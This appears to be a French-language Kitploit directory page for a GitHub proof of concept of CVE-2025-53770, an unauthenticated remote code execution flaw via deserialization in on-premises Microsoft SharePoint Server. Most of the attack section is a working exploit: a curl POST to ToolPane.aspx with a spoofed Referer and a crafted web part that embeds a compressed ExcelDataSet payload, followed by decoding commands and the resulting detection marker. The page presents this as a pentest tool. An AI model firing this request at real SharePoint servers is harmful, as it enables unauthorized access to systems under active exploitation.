Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-53770 — Exécution de code à distance non authentifiée via une désérialisation non sécurisée dans Microsoft SharePoint Server (CVE-2025-53770) | Kitploit
Outils/GitHubGitHub/muhammadwaseem29/cve-2025-53770
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubmuhammadwaseem29/cve-2025-53770

CVE-2025-53770

Exécution de code à distance non authentifiée via une désérialisation non sécurisée dans Microsoft SharePoint Server (CVE-2025-53770)

Voir le dépôt
5842il y a 1 anVérifié par Kitploit
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-53770 SharePoint Désérialisation RCE PoC

Critique — Exécution de code à distance sans authentification via une désérialisation non sécurisée dans Microsoft SharePoint Server (CVE-2025-53770)

Description

La désérialisation de données non fiables dans Microsoft SharePoint Server sur site permet à un attaquant d'exécuter du code à distance et de compromettre le système. Microsoft a connaissance d'une exploitation active et prépare une mise à jour complète. Assurez-vous que les mesures d'atténuation de la documentation CVE sont en place.

  • Impact : Les attaquants non authentifiés peuvent parvenir à une exécution de code à distance, entraînant une compromission complète du système.
  • Sévérité : Critique

Preuve de concept

La preuve de concept suivante montre comment un attaquant peut exploiter la vulnérabilité pour extraire et décoder des charges utiles malveillantes via le point de terminaison vulnérable.

Le domaine cible est intentionnellement remplacé par target.com.

Commande

root@kitploit:~
curl -sk -X POST 'https://target.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://target.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

Résultat

root@kitploit:~
<Info>IntruderScannerDetectionPayload</Info>
image

Références

  • Implémentation du payload de test
  • Analyse de sécurité de Code White
  • Directives Microsoft
  • Entrée NVD

Impact :
Les attaquants non authentifiés peuvent exploiter une désérialisation non sécurisée pour exécuter du code à distance sur SharePoint Server, entraînant une compromission complète du système.

Télécharger l’outil